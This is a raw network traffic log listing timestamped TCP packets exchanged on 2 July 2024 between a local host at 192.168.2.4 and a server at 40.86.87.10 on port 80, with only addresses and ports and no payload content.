Jul 2, 2024 07:31:07.934793949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934794903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934806108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934813976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934813976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934823990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934824944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934834957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934845924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934847116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934854984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934864044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934864998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934874058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934881926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934894085 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934915066 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935703993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935714960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935724020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935734987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935745001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935749054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935755968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935765982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935766935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935777903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935786009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935790062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935792923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935802937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935813904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935817957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935827017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935832977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935837984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935846090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935848951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935858965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935864925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935872078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.935878038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935895920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.935913086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936788082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936800003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936810970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936820984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936831951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936837912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936844110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936853886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936856031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936865091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936875105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936886072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936888933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936899900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936906099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936911106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936919928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936923027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936933994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936934948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936945915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.936953068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936969042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.936988115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.937491894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937504053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937513113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937524080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937530994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.937536001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937545061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.937546968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937558889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.937563896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.937577009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.937602997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.060369968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060431957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.060472965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060501099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060554028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.060635090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060646057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060657024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060668945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060709953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.060736895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.060904026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060967922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.060981989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061022997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061037064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061120987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061131954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061142921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061153889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061165094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061171055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061203003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061391115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061403990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061414957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061425924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061441898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061475039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061582088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061592102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061629057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061635017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061661005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061672926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061738014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061749935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061760902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061781883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061805010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061923027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061933041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061944008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061954975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.061975956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.061997890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062163115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062175035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062186003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062196970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062208891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062212944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062243938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062272072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062365055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062448978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062496901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062536001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062546968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062556982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062568903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062580109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062586069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062608957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062622070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062802076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062813044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062824011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062834978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062845945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.062866926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.062895060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063074112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063086033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063095093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063122034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063137054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063194990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063206911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063216925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063229084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063237906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063241005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063252926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063262939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063266993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063277006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063287020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063287020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063313007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063343048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063915968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063926935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063939095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063949108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063960075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063963890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063971996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063982010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.063983917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.063992977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064003944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064013958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064018011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064026117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064035892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064038038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064048052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064064980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064084053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064548969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064560890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064572096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064604998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064618111 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064690113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064702034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064712048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064723015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064733982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064740896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064744949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064755917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064768076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064771891 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064778090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064786911 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064790010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.064805984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.064838886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065572023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065582991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065593958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065604925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065614939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065625906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065627098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065638065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065648079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065655947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065660954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065671921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065675974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065681934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065687895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065692902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065704107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065715075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065721035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065727949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.065749884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.065772057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.066310883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.066328049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.066339016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.066349983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.066378117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.066406012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.177382946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177396059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177407026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177485943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.177520037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177566051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.177582026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177594900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177604914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177627087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.177656889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.177805901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177939892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177951097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177963018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177973986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177978992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.177984953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.177995920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178010941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178029060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178052902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178193092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178205013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178234100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178241968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178427935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178437948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178448915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178458929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178468943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178478003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178483963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178493977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178498983 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178505898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178517103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178527117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178533077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178533077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178544998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.178545952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178575993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.178600073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179037094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179049015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179060936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179084063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179100990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179306030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179316044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179330111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179341078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179351091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179361105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179359913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179369926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179378033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179379940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179389954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179395914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179399014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179409027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179415941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179419041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179429054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179438114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179439068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179450035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179456949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179457903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.179476976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179486990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.179517984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.221621037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.227822065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607769966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607810020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607821941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607834101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.607866049 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.607866049 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.607943058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607954979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607965946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607976913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.607984066 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.608006001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.608037949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.608135939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.608176947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.608211040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.608221054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.608257055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.608268023 CEST	80	49730	40.86.87.10	192.168.2.4
